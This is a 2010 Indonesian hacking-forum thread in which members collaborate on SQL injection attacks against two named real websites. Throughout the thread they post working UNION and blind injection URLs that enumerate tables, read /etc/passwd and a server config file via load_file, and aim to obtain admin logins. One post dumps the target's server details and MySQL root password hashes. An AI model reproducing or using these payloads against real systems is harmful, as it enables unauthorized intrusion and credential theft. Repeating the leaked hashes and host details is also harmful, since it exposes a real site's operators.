Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

Sya Nemukan Bug Ne

http://xcode.or.id/forum/viewtopic.php?f=99&t=37977

Page 1 of 2

Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 1:12 am
by anomie03
Langsung aja kale Ya Ne Pertama Saya Coba

-http://www.fragrance.org/news_detail.ph ... %28%29,6--
Hasilnya Bisa

Trus saya coba Lagi Yang Bawah Ne Masih Bisa Juga

-http://www.fragrance.org/news_detail.ph ... SE%28%29--

Tapi pas Saya Coba Untuk Cari Yang Dibawah Ne Gak Bisa
dak tau kenapa
- http://www.fragrance.org/news_detail.ph ... all+select 1,2,GROUP_CONCAT(column_NAME),4,5,6+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=( untuk Cari cover datanya pakek apa ya ?)
Kepada Temen Temen Saya Mohon Bantuanya

Re: Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 10:09 am
by 3xtr3m3b0y

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,group_concat(column_name),3,4,5,6+from+information_schema.columns+where+table_name=[Nama Tabel Dalam Bentuk Hexadecimal]--
Sebenarnya di awal kita sdh bisa mengetahui apakah nantinya pada penentuan Nama Tabel hrs menggunakan STRING atau HEXA, dengan mengetes sprt pada baris di bawah ini :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,'test',3,4,5,6--
Jika ERROR maka nantinya kita hrs menggunakan HEXA.
Hal ini sebenarnya terkait juga dengan sebuah directive di php.ini yaitu pada baris magic_quotes_gpc, jika baris itu bernilai OFF maka kita bisa menggunakan STRING namun jika ON maka kita hrs menggunakan nilai HEXA.

Re: Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 10:38 am
by cloroplast
Target: http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1


:ngakak: :ngakak: :ngakak:

Re: Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 12:17 pm
by 3xtr3m3b0y
cloroplast wrote:Target: http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1


:ngakak: :ngakak: :ngakak:
Wah mantep Om hasil petualanganx... :love:

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,user(),3,4,5,6+from+mysql.user--
System User: root@localhost << mengizinkan kita menggunakan fasilitas tambahan di MySQL Server yaitu LOAD_FILE (Membaca File yg ada pada Sistem) dan INTO+OUTFILE (Membuat File pada Sistem). Hanya sayang berhubung direktif magic_quotes_gpc = on, maka fasilitas INTO+OUTFILE tdk bisa kita gunakan, krn fasilitas tersebut hanya bisa menggunakan STRING.

Untuk mengecek jenis OS yg digunakan, bermanfaat untuk menentukan struktur Direktori lokasi-lokasi penting di Sistem :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6--
Contoh membuka isi file /etc/passwd di sistem :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6--
selanjutnya bisa dikembangkan ke tahap berikutnya...

Re: Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 6:44 pm
by anomie03
Trus situ yang menyediakan untuk menconversi bilang hexa ada g ?

Re: Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 6:48 pm
by untouch
3xtr3m3b0y wrote:
cloroplast wrote:Target: http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1


:ngakak: :ngakak: :ngakak:
Wah mantep Om hasil petualanganx... :love:

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,user(),3,4,5,6+from+mysql.user--
System User: root@localhost << mengizinkan kita menggunakan fasilitas tambahan di MySQL Server yaitu LOAD_FILE (Membaca File yg ada pada Sistem) dan INTO+OUTFILE (Membuat File pada Sistem). Hanya sayang berhubung direktif magic_quotes_gpc = on, maka fasilitas INTO+OUTFILE tdk bisa kita gunakan, krn fasilitas tersebut hanya bisa menggunakan STRING.

Untuk mengecek jenis OS yg digunakan, bermanfaat untuk menentukan struktur Direktori lokasi-lokasi penting di Sistem :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6--
Contoh membuka isi file /etc/passwd di sistem :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6--
selanjutnya bisa dikembangkan ke tahap berikutnya...
@3xtr3m3b0y

mantap...... selanjutnya gmn lg sob .. :love:

Re: Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 7:44 pm
by anomie03
trus di buat kaya gine bagaimana selanjutnya untuk dapatkan login admin nya

http://www.fragrance.org/news_detail.ph ... admin%20--

Re: Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 9:53 pm
by abit doang
anomie03 wrote:Trus situ yang menyediakan untuk menconversi bilang hexa ada g ?
string to hex
www.string-functions.com/string-hex.aspx

hex to string
www.string-functions.com/hex-string.aspx

Oline betar Ketemu Ne bug lagi

Posted: Sat Feb 27, 2010 10:27 pm
by anomie03
gak ngerti dengan ini site bugnya di mana?
http://www.vero-software.com/news_detai ... der+by+2--

Re: Sya Nemukan Bug Ne

Posted: Sat Feb 27, 2010 11:39 pm
by 3xtr3m3b0y
untouch wrote: @3xtr3m3b0y
mantap...... selanjutnya gmn lg sob .. :love:
Next Clue :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,2,3,4,load_file(0x2f7573722f6c6f63616c2f617061636865322f6874646f63732f436f6e6e656374696f6e732f636f6e6e46462e706870),6--
Setelah halaman terbuka, coba View Source...


anomie03 wrote:gak ngerti dengan ini site bugnya di mana?
http://www.vero-software.com/news_detai ... der+by+2--
Blind SQL :

Code: Select all

http://www.vero-software.com/news_detail.php?id=22+and+substring(@@version,1,1)=4   << FALSE
http://www.vero-software.com/news_detail.php?id=22+and+substring(@@version,1,1)=5   << TRUE
Dari baris di atas diketahui menggunakan mysql versi 5
Untuk mempermudah pencarian bisa menggunakan bantuan :
http://www.darkc0de.com/others/blindfuzz.py
http://www.darkc0de.com/others/blindext.py
All times are UTC+07:00
Page 1 of 2
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/